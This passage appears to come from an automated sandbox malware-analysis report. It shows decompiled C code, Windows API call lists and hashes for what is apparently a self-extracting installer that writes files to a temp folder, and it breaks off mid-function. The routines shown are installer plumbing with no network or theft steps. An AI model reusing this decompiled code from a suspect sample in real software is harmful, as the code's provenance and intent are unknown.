                                                            • Part of subcall function 010C2773: CharNextA.USER32(00000000), ref: 010C27BC
                                                            • Part of subcall function 010C2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010C2829
                                                            • Part of subcall function 010C2773: RegQueryValueExA.ADVAPI32(?,010C1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010C2852
                                                            • Part of subcall function 010C2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010C2870
                                                            • Part of subcall function 010C2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010C28A0
                                                          • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,010C3938,?,?,?,?,-00000005), ref: 010C2958
                                                          • GlobalLock.KERNEL32 ref: 010C2969
                                                          • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,010C3938,?,?,?,?,-00000005,?), ref: 010C2A21
                                                          • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 010C2A81
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                          • String ID:
                                                          • API String ID: 3949799724-0
                                                          • Opcode ID: 8dfced75566adba94798dd926fb997af106f76f8a6a7b350505fcd594126cbbf
                                                          • Instruction ID: 2e9ea8abf702e535e6095eecf1a111e314a110f3e4b37a403b89acbb7c36d1b3
                                                          • Opcode Fuzzy Hash: 8dfced75566adba94798dd926fb997af106f76f8a6a7b350505fcd594126cbbf
                                                          • Instruction Fuzzy Hash: 36512731A0021AEFDB21CF9DC884AAEBBB5FF48B10F14416EE985E3651DB359941CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 32%
                                                          			E010C4169(void* __eflags) {
                                                          				int _t18;
                                                          				void* _t21;
                                                          
                                                          				_t20 = E010C468F("FINISHMSG", 0, 0);
                                                          				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                          				if(_t21 != 0) {
                                                          					if(E010C468F("FINISHMSG", _t21, _t20) != 0) {
                                                          						if(lstrcmpA(_t21, "<None>") == 0) {
                                                          							L7:
                                                          							return LocalFree(_t21);
                                                          						}
                                                          						_push(0);
                                                          						_push(0x40);
                                                          						_push(0);
                                                          						_push(_t21);
                                                          						_t18 = 0x3e9;
                                                          						L6:
                                                          						E010C44B9(0, _t18);
                                                          						goto L7;
                                                          					}
                                                          					_push(0);
                                                          					_push(0x10);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_t18 = 0x4b1;
                                                          					goto L6;
                                                          				}
                                                          				return E010C44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                          			}





                                                          0x010c417d
                                                          0x010c418f
                                                          0x010c4193
                                                          0x010c41b7
                                                          0x010c41d3
                                                          0x010c41e6
                                                          0x00000000
                                                          0x010c41e7
                                                          0x010c41d5
                                                          0x010c41d6
                                                          0x010c41d8
                                                          0x010c41d9
                                                          0x010c41da
                                                          0x010c41df
                                                          0x010c41e1
                                                          0x00000000
                                                          0x010c41e1
                                                          0x010c41b9
                                                          0x010c41ba
                                                          0x010c41bc
                                                          0x010c41bd
                                                          0x010c41be
                                                          0x00000000
                                                          0x010c41be
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 010C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010C46A0
                                                            • Part of subcall function 010C468F: SizeofResource.KERNEL32(00000000,00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46A9
                                                            • Part of subcall function 010C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010C46C3
                                                            • Part of subcall function 010C468F: LoadResource.KERNEL32(00000000,00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46CC
                                                            • Part of subcall function 010C468F: LockResource.KERNEL32(00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46D3
                                                            • Part of subcall function 010C468F: memcpy_s.MSVCRT ref: 010C46E5
                                                            • Part of subcall function 010C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46EF
                                                          • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,010C30B4), ref: 010C4189
                                                          • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,010C30B4), ref: 010C41E7
                                                            • Part of subcall function 010C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010C4518
                                                            • Part of subcall function 010C44B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 010C4554
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                          • String ID: <None>$FINISHMSG
                                                          • API String ID: 3507850446-3091758298
                                                          • Opcode ID: 30bc9f99feb7488ef3751e3647d9716176f4530d8b59f3e0c5ef48c5c8442417
                                                          • Instruction ID: 2e4018577d0278d51eb9c27192e39ecc834dca5695a4e42084bbe37c39b52599
                                                          • Opcode Fuzzy Hash: 30bc9f99feb7488ef3751e3647d9716176f4530d8b59f3e0c5ef48c5c8442417
                                                          • Instruction Fuzzy Hash: 1F01DBB1700218AFF32517698CA4FAF658EEBD8E94F10402DBBC2E21849E68CC010AA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 93%
                                                          			E010C19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                          				signed int _v8;
                                                          				char _v520;
                                                          				void* __esi;
                                                          				signed int _t11;
                                                          				void* _t14;
                                                          				void* _t23;
                                                          				void* _t27;
                                                          				void* _t33;
                                                          				struct HWND__* _t34;
                                                          				signed int _t35;
                                                          
                                                          				_t33 = __edi;
                                                          				_t27 = __ebx;
                                                          				_t11 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t11 ^ _t35;
                                                          				_t34 = _a4;
                                                          				_t14 = _a8 - 0x110;
                                                          				if(_t14 == 0) {
                                                          					_t32 = GetDesktopWindow();
                                                          					E010C43D0(_t34, _t15);
                                                          					_v520 = 0;
                                                          					LoadStringA( *0x10c9a3c, _a16,  &_v520, 0x200);
                                                          					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                          					MessageBeep(0xffffffff);
                                                          					goto L6;
                                                          				} else {
                                                          					if(_t14 != 1) {
                                                          						L4:
                                                          						_t23 = 0;
                                                          					} else {
                                                          						_t32 = _a12;
                                                          						if(_t32 - 0x83d > 1) {
                                                          							goto L4;
                                                          						} else {
                                                          							EndDialog(_t34, _t32);
                                                          							L6:
                                                          							_t23 = 1;
                                                          						}
                                                          					}
                                                          				}
                                                          				return E010C6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                          			}













                                                          0x010c19e0
                                                          0x010c19e0
                                                          0x010c19eb
                                                          0x010c19f2
                                                          0x010c19f9
                                                          0x010c19fc
                                                          0x010c1a01
                                                          0x010c1a2a
                                                          0x010c1a2e
                                                          0x010c1a3e
                                                          0x010c1a4f
                                                          0x010c1a62
                                                          0x010c1a6a
                                                          0x00000000
                                                          0x010c1a03
                                                          0x010c1a06
                                                          0x010c1a20
                                                          0x010c1a20
                                                          0x010c1a08
                                                          0x010c1a08
                                                          0x010c1a14
                                                          0x00000000
                                                          0x010c1a16
                                                          0x010c1a18
                                                          0x010c1a70
                                                          0x010c1a72
                                                          0x010c1a72
                                                          0x010c1a14
                                                          0x010c1a06
                                                          0x010c1a81

                                                          APIs
                                                          • EndDialog.USER32(?,?), ref: 010C1A18
                                                          • GetDesktopWindow.USER32 ref: 010C1A24
                                                          • LoadStringA.USER32(?,?,00000200), ref: 010C1A4F
                                                          • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 010C1A62
                                                          • MessageBeep.USER32(000000FF), ref: 010C1A6A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                          • String ID:
                                                          • API String ID: 1273765764-0
                                                          • Opcode ID: efcaa6e6787844b1491c7e623b0eee2063954710732cee2aa983b7bb485ad902
                                                          • Instruction ID: 683b930f9ac0aaea23c5dc2daa5543969940a45f927378d4a660dadb8730dbd5
                                                          • Opcode Fuzzy Hash: efcaa6e6787844b1491c7e623b0eee2063954710732cee2aa983b7bb485ad902
                                                          • Instruction Fuzzy Hash: CA118E31A0010DEFDB20EF68D908AAE77F8EB89750F008199E99693185DA359E01CF95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 88%
                                                          			E010C63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				long _v272;
                                                          				void* _v276;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t15;
                                                          				long _t28;
                                                          				struct _OVERLAPPED* _t37;
                                                          				void* _t39;
                                                          				signed int _t40;
                                                          
                                                          				_t15 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t15 ^ _t40;
                                                          				_v272 = _v272 & 0x00000000;
                                                          				_push(__ecx);
                                                          				_v276 = _a16;
                                                          				_t37 = 1;
                                                          				E010C1781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
                                                          				E010C658A( &_v268, 0x104, _a12);
                                                          				_t28 = 0;
                                                          				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                          				if(_t39 != 0xffffffff) {
                                                          					_t28 = _a4;
                                                          					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                          						 *0x10c9124 = 0x80070052;
                                                          						_t37 = 0;
                                                          					}
                                                          					CloseHandle(_t39);
                                                          				} else {
                                                          					 *0x10c9124 = 0x80070052;
                                                          					_t37 = 0;
                                                          				}
                                                          				return E010C6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                          			}















                                                          0x010c63cb
                                                          0x010c63d2
                                                          0x010c63d8
                                                          0x010c63ea
                                                          0x010c63f3
                                                          0x010c6401
                                                          0x010c6402
                                                          0x010c6410
                                                          0x010c6415
                                                          0x010c6433
                                                          0x010c6438
                                                          0x010c6449
                                                          0x010c6463
                                                          0x010c646d
                                                          0x010c6477
                                                          0x010c6477
                                                          0x010c647a
                                                          0x010c643a
                                                          0x010c643a
                                                          0x010c6444
                                                          0x010c6444
                                                          0x010c6492

                                                          APIs
                                                          • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 010C642D
                                                          • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 010C645B
                                                          • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 010C647A
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 010C63EB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleWrite
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                          • API String ID: 1065093856-1193786559
                                                          • Opcode ID: dad0d64cf15c08982519b444f19cb2dd191d02f59170e71a44eaa01eb7af254b
                                                          • Instruction ID: ed9ac6cf5ee1e9cd0cd30c746cc4acfa809b120cb6f6d1e9361af5e36e4e3bba
                                                          • Opcode Fuzzy Hash: dad0d64cf15c08982519b444f19cb2dd191d02f59170e71a44eaa01eb7af254b
                                                          • Instruction Fuzzy Hash: C421C371A0021CAFD720DF25DC85FEF77A8EB99714F1041ADB9C5A3280DAB55D848F64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010C47E0(intOrPtr* __ecx) {
                                                          				intOrPtr _t6;
                                                          				intOrPtr _t9;
                                                          				void* _t11;
                                                          				void* _t19;
                                                          				intOrPtr* _t22;
                                                          				void _t24;
                                                          				struct HWND__* _t25;
                                                          				struct HWND__* _t26;
                                                          				void* _t27;
                                                          				intOrPtr* _t28;
                                                          				intOrPtr* _t33;
                                                          				void* _t34;
                                                          
                                                          				_t33 = __ecx;
                                                          				_t34 = LocalAlloc(0x40, 8);
                                                          				if(_t34 != 0) {
                                                          					_t22 = _t33;
                                                          					_t27 = _t22 + 1;
                                                          					do {
                                                          						_t6 =  *_t22;
                                                          						_t22 = _t22 + 1;
                                                          					} while (_t6 != 0);
                                                          					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                          					 *_t34 = _t24;
                                                          					if(_t24 != 0) {
                                                          						_t28 = _t33;
                                                          						_t19 = _t28 + 1;
                                                          						do {
                                                          							_t9 =  *_t28;
                                                          							_t28 = _t28 + 1;
                                                          						} while (_t9 != 0);
                                                          						E010C1680(_t24, _t28 - _t19 + 1, _t33);
                                                          						_t11 =  *0x10c91e0; // 0xc282e0
                                                          						 *(_t34 + 4) = _t11;
                                                          						 *0x10c91e0 = _t34;
                                                          						return 1;
                                                          					}
                                                          					_t25 =  *0x10c8584; // 0x0
                                                          					E010C44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                          					LocalFree(_t34);
                                                          					L2:
                                                          					return 0;
                                                          				}
                                                          				_t26 =  *0x10c8584; // 0x0
                                                          				E010C44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                          				goto L2;
                                                          			}















                                                          0x010c47e8
                                                          0x010c47f0
                                                          0x010c47f4
                                                          0x010c480f
                                                          0x010c4811
                                                          0x010c4814
                                                          0x010c4814
                                                          0x010c4816
                                                          0x010c4817
                                                          0x010c4829
                                                          0x010c482b
                                                          0x010c482f
                                                          0x010c484f
                                                          0x010c4852
                                                          0x010c4855
                                                          0x010c4855
                                                          0x010c4857
                                                          0x010c4858
                                                          0x010c4860
                                                          0x010c4865
                                                          0x010c486a
                                                          0x010c486f
                                                          0x00000000
                                                          0x010c4876
                                                          0x010c4831
                                                          0x010c4841
                                                          0x010c4847
                                                          0x010c480b
                                                          0x00000000
                                                          0x010c480b
                                                          0x010c47f6
                                                          0x010c4806
                                                          0x00000000

                                                          APIs
                                                          • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,010C4E6F), ref: 010C47EA
                                                          • LocalAlloc.KERNEL32(00000040,?), ref: 010C4823
                                                          • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 010C4847
                                                            • Part of subcall function 010C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010C4518
                                                            • Part of subcall function 010C44B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 010C4554
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 010C4851
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Local$Alloc$FreeLoadMessageString
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                          • API String ID: 359063898-1193786559
                                                          • Opcode ID: b163da831e7f89852d67e635f57eb98fb4b80ab959164124601bbe555242b065
                                                          • Instruction ID: 16bd6a5cec8b995a24048c53cf6bf7b3e17c0ef51f06955b8580a73d8b98219d
                                                          • Opcode Fuzzy Hash: b163da831e7f89852d67e635f57eb98fb4b80ab959164124601bbe555242b065
                                                          • Instruction Fuzzy Hash: 80110675604641AFE7658F249828F7F3B9AFBC5B40B14855DEDC2C7285DA3AC80ACF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 77%
                                                          			E010C6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                          				struct HRSRC__* _t6;
                                                          				void* _t21;
                                                          				struct HINSTANCE__* _t23;
                                                          				int _t24;
                                                          
                                                          				_t23 =  *0x10c9a3c; // 0x10c0000
                                                          				_t6 = FindResourceA(_t23, __edx, 5);
                                                          				if(_t6 == 0) {
                                                          					L6:
                                                          					E010C44B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                          					_t24 = _a16;
                                                          				} else {
                                                          					_t21 = LoadResource(_t23, _t6);
                                                          					if(_t21 == 0) {
                                                          						goto L6;
                                                          					} else {
                                                          						if(_a12 != 0) {
                                                          							_push(_a12);
                                                          						} else {
                                                          							_push(0);
                                                          						}
                                                          						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                          						FreeResource(_t21);
                                                          						if(_t24 == 0xffffffff) {
                                                          							goto L6;
                                                          						}
                                                          					}
                                                          				}
                                                          				return _t24;
                                                          			}







                                                          0x010c651f
                                                          0x010c652a
                                                          0x010c6534
                                                          0x010c656b
                                                          0x010c6577
                                                          0x010c657c
                                                          0x010c6536
                                                          0x010c653e
                                                          0x010c6542
                                                          0x00000000
                                                          0x010c6544
                                                          0x010c6547
                                                          0x010c654c
                                                          0x010c6549
                                                          0x010c6549
                                                          0x010c6549
                                                          0x010c655e
                                                          0x010c6560
                                                          0x010c6569
                                                          0x00000000
                                                          0x00000000
                                                          0x010c6569
                                                          0x010c6542
                                                          0x010c6587

                                                          APIs
                                                          • FindResourceA.KERNEL32(010C0000,000007D6,00000005), ref: 010C652A
                                                          • LoadResource.KERNEL32(010C0000,00000000,?,?,010C2EE8,00000000,010C19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 010C6538
                                                          • DialogBoxIndirectParamA.USER32(010C0000,00000000,00000547,010C19E0,00000000), ref: 010C6557
                                                          • FreeResource.KERNEL32(00000000,?,?,010C2EE8,00000000,010C19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 010C6560
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                          • String ID:
                                                          • API String ID: 1214682469-0
                                                          • Opcode ID: 566dc1032f279b6c4dceb35f94a06fb633a7c962b5602d2e98924908fef97aa7
                                                          • Instruction ID: eb983da292a56d414bb727df20b3aefb6ba8fde99aabaff9cb060cb43a2c35f6
                                                          • Opcode Fuzzy Hash: 566dc1032f279b6c4dceb35f94a06fb633a7c962b5602d2e98924908fef97aa7
                                                          • Instruction Fuzzy Hash: 7F018472600519BFDB315B599C48DBF7AACEB95B61F100159FE9093244DA77CD108FA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010C3680(void* __ecx) {
                                                          				void* _v8;
                                                          				struct tagMSG _v36;
                                                          				int _t8;
                                                          				struct HWND__* _t16;
                                                          
                                                          				_v8 = __ecx;
                                                          				_t16 = 0;
                                                          				while(1) {
                                                          					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                          					if(_t8 == 0) {
                                                          						break;
                                                          					}
                                                          					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                          						continue;
                                                          					} else {
                                                          						do {
                                                          							if(_v36.message != 0x12) {
                                                          								DispatchMessageA( &_v36);
                                                          							} else {
                                                          								_t16 = 1;
                                                          							}
                                                          							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                          						} while (_t8 != 0);
                                                          						if(_t16 == 0) {
                                                          							continue;
                                                          						}
                                                          					}
                                                          					break;
                                                          				}
                                                          				return _t8;
                                                          			}







                                                          0x010c368c
                                                          0x010c368f
                                                          0x010c3691
                                                          0x010c369f
                                                          0x010c36a7
                                                          0x00000000
                                                          0x00000000
                                                          0x010c36ba
                                                          0x00000000
                                                          0x010c36bc
                                                          0x010c36bc
                                                          0x010c36c0
                                                          0x010c36cb
                                                          0x010c36c2
                                                          0x010c36c4
                                                          0x010c36c4
                                                          0x010c36da
                                                          0x010c36e0
                                                          0x010c36e6
                                                          0x00000000
                                                          0x00000000
                                                          0x010c36e6
                                                          0x00000000
                                                          0x010c36ba
                                                          0x010c36ed

                                                          APIs
                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 010C369F
                                                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010C36B2
                                                          • DispatchMessageA.USER32(?), ref: 010C36CB
                                                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010C36DA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                          • String ID:
                                                          • API String ID: 2776232527-0
                                                          • Opcode ID: 1d39fdd69cc1aae150ee88c11e6554c020e2bd8e147d1710a959ab403cc9dc9b
                                                          • Instruction ID: d0843ed73726712bb7726676a151f37706f5e0a41a37b2fc07ed2d366b7833e8
                                                          • Opcode Fuzzy Hash: 1d39fdd69cc1aae150ee88c11e6554c020e2bd8e147d1710a959ab403cc9dc9b
                                                          • Instruction Fuzzy Hash: CF017172A00218ABDB304BAA5C48EAF7ABCEBC9F50F00815DBE45E6284D6658540CEA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 72%
                                                          			E010C65E8(char* __ecx) {
                                                          				char _t3;
                                                          				char _t10;
                                                          				char* _t12;
                                                          				char* _t14;
                                                          				char* _t15;
                                                          				CHAR* _t16;
                                                          
                                                          				_t12 = __ecx;
                                                          				_t15 = __ecx;
                                                          				_t14 =  &(__ecx[1]);
                                                          				_t10 = 0;
                                                          				do {
                                                          					_t3 =  *_t12;
                                                          					_t12 =  &(_t12[1]);
                                                          				} while (_t3 != 0);
                                                          				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                          				while(1) {
                                                          					_t16 = CharPrevA(_t15, ??);
                                                          					if(_t16 <= _t15) {
                                                          						break;
                                                          					}
                                                          					if( *_t16 == 0x5c) {
                                                          						L7:
                                                          						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                          							_t16 = CharNextA(_t16);
                                                          						}
                                                          						 *_t16 = _t10;
                                                          						_t10 = 1;
                                                          					} else {
                                                          						_push(_t16);
                                                          						continue;
                                                          					}
                                                          					L11:
                                                          					return _t10;
                                                          				}
                                                          				if( *_t16 == 0x5c) {
                                                          					goto L7;
                                                          				}
                                                          				goto L11;
                                                          			}









                                                          0x010c65e8
                                                          0x010c65ed
                                                          0x010c65ef
                                                          0x010c65f2
                                                          0x010c65f4
                                                          0x010c65f4
                                                          0x010c65f6
                                                          0x010c65f7
                                                          0x010c6608
                                                          0x010c6611
                                                          0x010c6618
                                                          0x010c661c
                                                          0x00000000
                                                          0x00000000
                                                          0x010c660e
                                                          0x010c6623
                                                          0x010c6625
                                                          0x010c663b
                                                          0x010c663b
                                                          0x010c663d
                                                          0x010c6641
                                                          0x010c6610
                                                          0x010c6610
                                                          0x00000000
                                                          0x010c6610
                                                          0x010c6644
                                                          0x010c6647
                                                          0x010c6647
                                                          0x010c6621
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,010C2B33), ref: 010C6602
                                                          • CharPrevA.USER32(?,00000000), ref: 010C6612
                                                          • CharPrevA.USER32(?,00000000), ref: 010C6629
                                                          • CharNextA.USER32(00000000), ref: 010C6635
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Char$Prev$Next
                                                          • String ID:
                                                          • API String ID: 3260447230-0
                                                          • Opcode ID: 0cec8228a058bbb110ec937e73f1f91dd91030ddbe02a814b05bb80da962279a
                                                          • Instruction ID: 8359d50ec6ef6ea80867946b49ebfda9aaad12fb015ca98b84796c8936e7ae27
                                                          • Opcode Fuzzy Hash: 0cec8228a058bbb110ec937e73f1f91dd91030ddbe02a814b05bb80da962279a
                                                          • Instruction Fuzzy Hash: F9F0D132104150AEE7320B2D888C8BFBFDCCF8B59472901AFE9D183201E61B09068F61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010C69B0() {
                                                          				intOrPtr* _t4;
                                                          				intOrPtr* _t5;
